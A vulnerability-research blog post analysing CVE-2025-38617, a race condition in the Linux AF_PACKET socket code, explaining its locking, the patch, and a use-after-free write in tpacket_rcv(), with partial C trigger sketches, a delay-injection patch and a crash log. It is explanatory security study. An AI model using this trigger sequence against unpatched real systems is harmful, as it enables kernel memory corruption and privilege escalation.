A Quick Note on CVE-2025-38617
This vulnerability is a race condition in net/packet, which was exploited in kernelCTF. The corresponding patch commit can be found here.
Note: I tried to analyze this without looking at the commit details, which helped me realize which perspectives I had been missing when it comes to finding vulnerabilities. As a result, there are many side notes (or personal insights) in this post.
1. Introduction
The protocol operation table for the AF_PACKET socket is packet_ops, whose setsockopt handler is packet_setsockopt() [1].
static const struct proto_ops packet_ops = {
.family = PF_PACKET,
// [...]
.setsockopt = packet_setsockopt, // [1]
// [...]
};
The handler supports several options, some of which call the function packet_set_ring() [2] to configure the TX and RX ring buffers. In general, almost all socket handlers (not limited to AF_PACKET) acquire the socket lock by calling lock_sock(sk) [3] before modifying the socket object or its private data.
static int
packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
unsigned int optlen)
{
// [...]
switch (optname) {
// [...]
case PACKET_RX_RING:
case PACKET_TX_RING:
{
// [...]
lock_sock(sk); // [3]
if (!ret)
ret = packet_set_ring(sk, &req_u, 0, // [2]
optname == PACKET_TX_RING);
release_sock(sk);
}
// [...]
}
// [...]
}
packet_set_ring() first calculates the ring buffer size and allocates memory. It then stops the socket before updating its metadata, and resumes it afterward, to avoid concurrent access to these objects.
In total, three locks are used to protect against race conditions. First, po->bind_lock [3, 4] guards concurrent registration and unregistration. Registration means the socket is running, with the PACKET_SOCK_RUNNING flag set, and can be accessed at any time; unregistration, on the other hand, means the socket is inactive and cannot be accessed. The lock po->pg_vec_lock protects concurrent access to rb->pg_vec[] [5], while rb_queue->lock protects the skb queue [6].
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
// [...]
spin_lock(&po->bind_lock); // [3] unregister
was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
num = po->num;
if (was_running) {
WRITE_ONCE(po->num, 0);
__unregister_prot_hook(sk, false);
}
spin_unlock(&po->bind_lock);
mutex_lock(&po->pg_vec_lock); // [5]
if (closing || atomic_long_read(&po->mapped) == 0) {
// [...]
spin_lock_bh(&rb_queue->lock); // [6]
swap(rb->pg_vec, pg_vec);
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map);
spin_unlock_bh(&rb_queue->lock);
// [...]
swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);
// [...]
skb_queue_purge(rb_queue);
// [...]
}
mutex_unlock(&po->pg_vec_lock);
spin_lock(&po->bind_lock); // [4] register
if (was_running) {
WRITE_ONCE(po->num, num);
register_prot_hook(sk);
}
spin_unlock(&po->bind_lock);
// [...]
}
2. Analysis
2.1. Surface-level
To gain a deeper understanding of this vulnerability, rather than simply treating it as a race condition, we can analyze the design and identify why so many locks are required.
The socket is stopped before updating the metadata. Perhaps something problematic occurs if the socket is running while the metadata is being updated? To prevent concurrent access, one option would be to hold po->bind_lock for the entire critical section. However, skb_queue_purge() may take a long time if the queue is filled with many skbs, creating a performance bottleneck. Thus, this is not a good solution.
As a result, the process is divided into three parts: first, the socket is stopped with the spin lock acquired; second, the ring buffer is updated under the protection of a mutex lock; and finally, the socket is resumed.
But now you may have some questions:
- Is there any data protected by po->bind_lock that could be subject to a race between the two lock operations?
- Clearly, register_prot_hook() can be called by another thread right after the unregistration. What happens then?
- What happens if __unregister_prot_hook() is called twice by another thread?
For the first question, po->bind_lock seems to be used mainly to protect socket state transitions rather than raw data, so not much data is actually modified under this lock.
For the second and third questions, we need to identify functions that can race with the registration or unregistration. Interestingly, the only such function that does not acquire the socket lock (lock_sock(sk)) is packet_notifier(). Therefore, this function can be used to trigger a race condition.
This function is the notifier handler for AF_PACKET sockets [1], and it is invoked whenever the state of the device associated with a socket changes. For example, deactivating an active device triggers a NETDEV_DOWN event, which is then dispatched to the sockets.
static struct notifier_block packet_netdev_notifier = {
.notifier_call = packet_notifier, // [1]
};
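As a side note, these notifier events can be generated from userspace simply by toggling the interface's IFF_UP flag. The exploit flow shown later goes through the netlink path (do_setlink()), but the plain SIOCSIFFLAGS ioctl reaches the same notifier chain. A minimal sketch, where the helper name, the interface handling, and the missing error checks are all illustrative:
#include <net/if.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <unistd.h>
/* Toggle IFF_UP on an interface, which makes the kernel emit a
 * NETDEV_UP or NETDEV_DOWN event that packet_notifier() receives. */
static void set_iface_up(const char *name, int up)
{
    struct ifreq ifr = {0};
    int fd = socket(AF_INET, SOCK_DGRAM, 0);
    strncpy(ifr.ifr_name, name, IFNAMSIZ - 1);
    ioctl(fd, SIOCGIFFLAGS, &ifr);
    if (up)
        ifr.ifr_flags |= IFF_UP;
    else
        ifr.ifr_flags &= ~IFF_UP;
    ioctl(fd, SIOCSIFFLAGS, &ifr);
    close(fd);
}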
The packet_notifier() function iterates over all in-use sockets [2]. If the event is NETDEV_DOWN, it calls __unregister_prot_hook() [3] under po->bind_lock [4], provided that the socket is running. If the event is NETDEV_UP, it calls register_prot_hook() [5], also under po->bind_lock [6], when po->num is not zero.
static int packet_notifier(struct notifier_block *this,
unsigned long msg, void *ptr)
{
struct net_device *dev = netdev_notifier_info_to_dev(ptr);
struct net *net = dev_net(dev);
struct packet_mclist *ml, *tmp;
LIST_HEAD(mclist);
struct sock *sk;
rcu_read_lock();
sk_for_each_rcu(sk, &net->packet.sklist) { // [2]
struct packet_sock *po = pkt_sk(sk);
switch (msg) {
// [...]
case NETDEV_DOWN:
if (dev->ifindex == po->ifindex) {
spin_lock(&po->bind_lock); // [4]
if (packet_sock_flag(po, PACKET_SOCK_RUNNING)) {
__unregister_prot_hook(sk, false); // [3]
// [...]
}
// [...]
spin_unlock(&po->bind_lock);
}
break;
case NETDEV_UP:
if (dev->ifindex == po->ifindex) {
spin_lock(&po->bind_lock); // [6]
if (po->num)
register_prot_hook(sk); // [5]
spin_unlock(&po->bind_lock);
}
break;
}
}
rcu_read_unlock();
// [...]
return NOTIFY_DONE;
}
We have now identified a function that can race with registration and unregistration, so let’s address the second and third questions.
The registration performed by register_prot_hook() only takes effect if the socket is not already running [7], so the hook cannot be registered twice. Therefore, the second question poses no issue.
static void register_prot_hook(struct sock *sk)
{
// [...]
__register_prot_hook(sk);
}
static void __register_prot_hook(struct sock *sk)
{
struct packet_sock *po = pkt_sk(sk);
if (!packet_sock_flag(po, PACKET_SOCK_RUNNING)) { // [7]
if (po->fanout)
__fanout_link(sk, po);
else
dev_add_pack(&po->prot_hook);
sock_hold(sk);
packet_sock_flag_set(po, PACKET_SOCK_RUNNING, 1);
}
}
For the third question, although the function __unregister_prot_hook() itself does not check the socket state, its invocation within packet_notifier() requires the socket to be running. Therefore, it cannot be unregistered multiple times.
static void __unregister_prot_hook(struct sock *sk, bool sync)
{
struct packet_sock *po = pkt_sk(sk);
// [...]
packet_sock_flag_set(po, PACKET_SOCK_RUNNING, 0);
if (po->fanout)
__fanout_unlink(sk, po);
else
__dev_remove_pack(&po->prot_hook);
__sock_put(sk);
// [...]
}
So, what’s the problem?
2.2. In-depth
Since I had no clear idea at first 😭, I eventually got some hints from the commit message. I then noticed that the state transition operations in packet_notifier() and packet_set_ring() are slightly different.
In packet_set_ring(), the check for __unregister_prot_hook() is the same as the one in packet_notifier(), with both depending on the PACKET_SOCK_RUNNING flag.
However, for register_prot_hook(), the check in packet_set_ring() depends on whether the socket was previously running (was_running), which makes sense. In contrast, the check in packet_notifier() relies on whether the po->num value is non-zero [1], instead of checking the running flag.
static int packet_notifier(struct notifier_block *this,
unsigned long msg, void *ptr)
{
// [...]
sk_for_each_rcu(sk, &net->packet.sklist) {
struct packet_sock *po = pkt_sk(sk);
switch (msg) {
// [...]
case NETDEV_UP:
if (dev->ifindex == po->ifindex) {
spin_lock(&po->bind_lock);
if (po->num) // [1]
register_prot_hook(sk);
spin_unlock(&po->bind_lock);
}
break;
}
}
// [...]
}
So, we can first create an AF_PACKET socket bound to a network device and then shut that device down. At this point, the target socket’s po->num is not zero, but the running flag is not set.
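A rough sketch of this setup follows; the interface name, the protocol, and the lack of error handling are illustrative and not taken from the actual exploit:
#include <arpa/inet.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <sys/socket.h>
static int setup_victim_socket(const char *ifname)
{
    int fd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    struct sockaddr_ll sll = {0};
    /* Binding to a specific interface sets po->ifindex, and po->num
     * stays equal to the bound protocol, i.e. non-zero. */
    sll.sll_family = AF_PACKET;
    sll.sll_protocol = htons(ETH_P_ALL);
    sll.sll_ifindex = if_nametoindex(ifname);
    bind(fd, (struct sockaddr *)&sll, sizeof(sll));
    /* Now shut the interface down (e.g. with the SIOCSIFFLAGS helper
     * sketched earlier, or via netlink): packet_notifier() handles the
     * NETDEV_DOWN event and clears PACKET_SOCK_RUNNING, while po->num
     * remains non-zero. */
    return fd;
}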
After that, we create two threads to execute the following flow:
[thread-1] [thread-2]
__sys_sendmsg() packet_set_ring()
...
do_setlink()
...
notifier_call_chain()
packet_notifier()
spin_lock(&po->bind_lock)
was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING)
/* was_running == false, so do nothing */
spin_unlock(&po->bind_lock)
spin_lock(&po->bind_lock)
register_prot_hook(sk) /* activate the socket */
spin_unlock(&po->bind_lock)
... [=== CONTINUE WITH SOCKET REGISTERED ===]
Consequently, packet_set_ring() continues to execute and modifies metadata while the socket is registered and able to receive packets.
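In userspace, the two racing threads could look roughly like the sketch below. It reuses the hypothetical pkt_fd socket and set_iface_up() helper from the earlier sketches, brings the device up via SIOCSIFFLAGS instead of the netlink path shown in the diagram (both reach the same notifier chain), and in practice the narrow window must be widened, e.g. with the delays described in the PoC section.
#include <linux/if_packet.h>
#include <pthread.h>
#include <sys/socket.h>
/* Hypothetical helpers from the earlier sketches. */
extern int pkt_fd;
void set_iface_up(const char *name, int up);
/* Thread 2: reconfigure the ring while the device is down. */
static void *ring_thread(void *arg)
{
    struct tpacket_req req = {
        .tp_block_size = 4096,
        .tp_block_nr   = 4,
        .tp_frame_size = 2048,
        .tp_frame_nr   = 8, /* (block_size / frame_size) * block_nr */
    };
    setsockopt(pkt_fd, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));
    return NULL;
}
/* Thread 1: bring the device back up, so that packet_notifier() sees
 * NETDEV_UP, finds po->num != 0, and re-registers the hook while
 * packet_set_ring() is still between its two bind_lock sections. */
static void *netdev_thread(void *arg)
{
    set_iface_up("lo", 1); /* interface name is just an example */
    return NULL;
}
static void run_race(void)
{
    pthread_t t1, t2;
    pthread_create(&t2, NULL, ring_thread, NULL);
    pthread_create(&t1, NULL, netdev_thread, NULL);
    pthread_join(t2, NULL);
    pthread_join(t1, NULL);
}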
To verify our idea, we can refer to the patch diff. The patch addresses this race condition by temporarily setting po->num to zero even when the socket is inactive, ensuring that the socket cannot be activated while the metadata is being updated.
spin_lock(&po->bind_lock);
was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING);
num = po->num;
- if (was_running) {
- WRITE_ONCE(po->num, 0);
+ WRITE_ONCE(po->num, 0);
+ if (was_running)
__unregister_prot_hook(sk, false);
- }
3. Find Exploit Path
3.1. First Try
But what can we do if the race condition hits?
The registration handler calls either __fanout_link() [1] or dev_add_pack() [2], depending on whether po->fanout exists. Internally, __fanout_link() also calls dev_add_pack() [3].
static void __register_prot_hook(struct sock *sk)
{
struct packet_sock *po = pkt_sk(sk);
if (!packet_sock_flag(po, PACKET_SOCK_RUNNING)) {
if (po->fanout)
__fanout_link(sk, po); // [1]
else
dev_add_pack(&po->prot_hook); // [2]
// [...]
packet_sock_flag_set(po, PACKET_SOCK_RUNNING, 1);
}
}
static void __fanout_link(struct sock *sk, struct packet_sock *po)
{
struct packet_fanout *f = po->fanout;
spin_lock(&f->lock);
rcu_assign_pointer(f->arr[f->num_members], sk);
// [...]
f->num_members++;
if (f->num_members == 1)
dev_add_pack(&f->prot_hook); // [3]
spin_unlock(&f->lock);
}
The dev_add_pack() function adds the packet_type object to the protocol handler list [4].
void dev_add_pack(struct packet_type *pt)
{
struct list_head *head = ptype_head(pt);
// [...]
spin_lock(&ptype_lock);
list_add_rcu(&pt->list, head); // [4]
spin_unlock(&ptype_lock);
}
Once the socket's hook is on this list, it can receive packets from the network softirq asynchronously. Therefore, we need to pay attention to fields that are accessed after the unregistration in packet_set_ring(), as this data may still be used by the receive handler.
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct sk_buff_head *rb_queue;
// [...]
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;
// [...]
mutex_lock(&po->pg_vec_lock);
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec);
// [...]
swap(rb->rx_owner_map, rx_owner_map);
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);
swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);
rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
// [...]
mutex_unlock(&po->pg_vec_lock);
// [...]
out_free_pg_vec:
if (pg_vec) {
bitmap_free(rx_owner_map);
free_pg_vec(pg_vec, order, req->tp_block_nr);
}
}
Unfortunately, I could not find an exploit path to leverage this race condition at first. Some of my ideas and attempts are listed below.
Being registered also means the socket can receive packets: dev_add_pack() allows the network softirq handler to dispatch skbs to this socket. With this race, the socket can receive skbs while its metadata is being updated, so issues may occur when the receive hook function is invoked.
skb_queue_purge() splices the skbs in the queue onto a temporary list and frees them under the queue head's ->lock, while the receive handler calls __skb_queue_tail() under the socket's ->sk_receive_queue lock. This potentially introduces race condition issues.
However, the receive handler processes skbs without obvious mistakes, which blocked my analysis from going any further.
3.2. Second Try
One day later, I still had no idea, so I DM’d the report author (quangle97) to ask for some guidance, and he generously shared many of his insights and the exploit path with me. I really appreciate his kindness and willingness to share :).
Overall, my analysis direction was correct, but I failed to fully review and understand the receive handler, which internally holds a reference to data that will later be freed in packet_set_ring(). So, let’s go back and analyze the implementation of the receive handler.
A packet socket with a page vector enabled uses tpacket_rcv() as its receive handler. This function calls packet_current_rx_frame() to obtain a data buffer [1] under the receive queue lock [2]. The data buffer is then used to populate fields [3] related to the network link layer.
static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
struct sockaddr_ll *sll;
// [...]
spin_lock(&sk->sk_receive_queue.lock); // [2]
h.raw = packet_current_rx_frame(po, skb, // [1]
TP_STATUS_KERNEL, (macoff+snaplen));
// [...]
spin_unlock(&sk->sk_receive_queue.lock);
// [...]
sll = h.raw + TPACKET_ALIGN(hdrlen); // [3]
sll->sll_halen = dev_parse_header(skb, sll->sll_addr);
sll->sll_family = AF_PACKET;
sll->sll_hatype = dev->type;
sll->sll_protocol = (sk->sk_type == SOCK_DGRAM) ?
// [...]
}
If the socket version is v1 or v2, packet_lookup_frame() is called [4] to retrieve a page buffer [5] from the page vector, which is allocated in packet_set_ring().
static void *packet_current_rx_frame(struct packet_sock *po,
struct sk_buff *skb,
int status, unsigned int len)
{
char *curr = NULL;
switch (po->tp_version) {
case TPACKET_V1:
case TPACKET_V2:
curr = packet_lookup_frame(po, &po->rx_ring, // [4]
po->rx_ring.head, status);
return curr;
// [...]
}
}
static void *packet_lookup_frame(const struct packet_sock *po,
const struct packet_ring_buffer *rb,
unsigned int position,
int status)
{
unsigned int pg_vec_pos, frame_offset;
union tpacket_uhdr h;
pg_vec_pos = position / rb->frames_per_block;
frame_offset = position % rb->frames_per_block;
h.raw = rb->pg_vec[pg_vec_pos].buffer + // [5]
(frame_offset * rb->frame_size);
// [...]
return h.raw;
}
However, the buffer will be freed at the end of packet_set_ring(). With the following execution flow, this race condition allows arbitrary data to be written into a freed page:
[thread-1] [thread-2] [thread-3]
__sys_sendmsg() packet_set_ring()
...
do_setlink()
...
notifier_call_chain()
packet_notifier()
spin_lock(&po->bind_lock)
was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING)
/* was_running == false, so do nothing */
spin_unlock(&po->bind_lock)
...
spin_lock(&po->bind_lock)
register_prot_hook(sk) /* activate the socket */
spin_unlock(&po->bind_lock)
...
tpacket_rcv()
spin_lock(&sk->sk_receive_queue.lock)
h.raw = packet_current_rx_frame(po)
packet_lookup_frame(&po->rx_ring)
return h.raw = rb->pg_vec[pg_vec_pos].buffer
spin_unlock(&sk->sk_receive_queue.lock)
...
spin_lock_bh(&rb_queue->lock)
swap(rb->pg_vec, pg_vec)
spin_unlock_bh(&rb_queue->lock)
free_pg_vec(pg_vec)
free_pages(pg_vec[i].buffer, order)
...
sll = h.raw + TPACKET_ALIGN(hdrlen)
sll->sll_halen = ... [=== WRITE TO FREE PAGE ===]
4. Proof-Of-Concept
To reproduce it more easily, I added some delays in critical functions: tpacket_rcv()
and packet_set_ring()
.
diff --git a/net/packet/af_packet_bk.c b/net/packet/af_packet.c
index 4abf7e9..e23fbcb 100644
--- a/net/packet/af_packet_bk.c
+++ b/net/packet/af_packet.c
@@ -2507,6 +2507,7 @@ static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
BUG();
}
+ mdelay(10000);
sll = h.raw + TPACKET_ALIGN(hdrlen);
sll->sll_halen = dev_parse_header(skb, sll->sll_addr);
sll->sll_family = AF_PACKET;
@@ -4574,6 +4575,7 @@ static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
spin_unlock(&po->bind_lock);
synchronize_net();
+ mdelay(3000);
err = -EBUSY;
mutex_lock(&po->pg_vec_lock);
Once the race condition is hit, a kernel panic is triggered due to a null pointer dereference.
[ 36.191917] BUG: kernel NULL pointer dereference, address: 0000000000000000
[ 36.191917] #PF: supervisor read access in kernel mode
[ 36.191917] #PF: error_code(0x0000) - not-present page
[ 36.191917] PGD 105c10067 P4D 105c10067 PUD 105c0f067 PMD 0
[ 36.191917] Oops: 0000 [#1] PREEMPT SMP NOPTI
[ 36.191917] CPU: 1 PID: 188 Comm: test Not tainted 6.6.94 #5
[ 36.191917] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-5 04/01/2014
[ 36.191917] RIP: 0010:tpacket_rcv+0xac4/0xdb0
[ 36.191917] Code: 87 00 05 00 00 4c 8b 04 24 83 f8 01 0f 84 80 01 00 00 83 f8 02 75 49 8b 44 24 18 41 89 40 14 49 8b 87 50 03 0c
[...]
[ 36.191917] Call Trace:
[ 36.191917] <TASK>
[ 36.191917] dev_queue_xmit_nit+0x292/0x2d0
[ 36.191917] dev_hard_start_xmit+0xa5/0x220
[ 36.191917] __dev_queue_xmit+0x248/0xde0
[ 36.191917] ? packet_parse_headers+0x152/0x240
[ 36.191917] packet_sendmsg+0x9f9/0x17e0
[ 36.191917] ? packet_sendmsg+0x1279/0x17e0
[ 36.191917] __sys_sendto+0x1fb/0x210
[ 36.191917] __x64_sys_sendto+0x20/0x30
...
The PoC code can be found here. It should be run in a namespace with root privileges because of the use of AF_PACKET.
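A common way to satisfy that requirement without real root is to enter fresh user and network namespaces, which provide CAP_NET_RAW and CAP_NET_ADMIN inside the namespace. A minimal sketch, assuming unprivileged user namespaces are enabled on the target:
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <unistd.h>
/* Become "root" inside fresh user + net namespaces, which grants the
 * CAP_NET_RAW / CAP_NET_ADMIN needed for AF_PACKET sockets and for
 * toggling the (namespaced) interface. */
static int enter_netns_sandbox(void)
{
    uid_t uid = getuid();
    FILE *f;
    if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0)
        return -1;
    /* Map our original uid to 0 in the new user namespace. */
    f = fopen("/proc/self/uid_map", "w");
    if (!f)
        return -1;
    fprintf(f, "0 %u 1\n", (unsigned int)uid);
    fclose(f);
    return 0;
}
Inside the new namespace only the loopback interface exists by default, which is typically enough to bind the packet socket and toggle a device up and down, though the original PoC may set things up differently.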
5. Conclusion
At a low level, finding race conditions involves reviewing which fields are accessed by functions without holding a lock. At a higher level, we need to understand why developers introduced the lock and what kinds of race situations they intended to protect against. Both perspectives are important, and I am still refining my strategy for identifying racy issues.
Moreover, some race conditions may seem harmless at first glance, such as state transition races, but upon closer examination they can lead to memory corruption. Besides this vulnerability, CVE-2024-50264 is also a good example.
Thanks again to quangle97 for answering my questions!